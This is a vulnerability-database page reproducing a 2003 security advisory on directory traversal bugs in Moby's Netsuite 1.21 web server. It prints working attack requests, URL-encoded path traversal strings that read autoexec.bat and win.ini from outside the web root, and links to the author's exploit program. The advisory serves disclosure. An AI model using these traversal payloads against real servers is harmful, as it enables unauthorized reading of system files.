Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Netsuite121.txt

🗓️ 15 Jul 2003 00:00:00Reported by Dr. InsaneType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Moby's Netsuite 1.21 has directory traversal bugs allowing unauthorized file access.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
Moby's Netsuite 1.21 Traversal Directory bugs  
  
  
Release Date:  
13 July, 2003  
  
  
Description:  
NetSuite is a freeware server suite that allows anyone with a static IP address the ability to run their own mail and web services. Note that you cannot reasonably run a web server from a normal dial-in account.   
Netsuite is designed for complete simplicity -- requiring only a few minutes to setup with no prior network skills or experience, and requires virtually no memory or processor time. General Windows file management and an understanding of the Internet is required. There are two sections: Moby Mail and Moby Web. Both are very direct to install and use, requiring only few minutes to begin using. Full source code for Microsoft Visual C++ 6.0 is available on the web.   
  
There exists some directory traversal vulnerabilities that allow someone to download or read  
files outside the web folder. In order for this attack to work we have to use some HTML characters instead of normal one.  
  
  
The attack:  
  
GET / HTTP/1.1  
Host: /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat  
  
In our example above we want to see the file autoexec.bat.  
***The folder /error/ doesn't exist in my Pc:P ehhe  
  
Other attack strings: http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin.ini  
http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin%2eini  
http://127.0.0.1/\..\..\..\windows\win.ini  
While i was searching i found about 25 attack string.This is only a small sample above.  
  
  
The Attack Program:  
I have created a sample attack program for Moby's Netsuite 1.21(possibly it for all versions of Moby's Netsuite ). You can get it from here:   
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/  
  
  
Disclaimer  
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.  
  
  
Feedback  
Please send suggestions, updates, and comments to:  
Dr_insane  
[email protected]  
http://members.lycos.co.uk/r34ct/  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Jul 2003 00:00Current
7.4High risk
Vulners AI Score7.4
directory traversal vulnerabilitiesmoby mailmoby webattack stringssample attack programfreeware server
22
.json
Report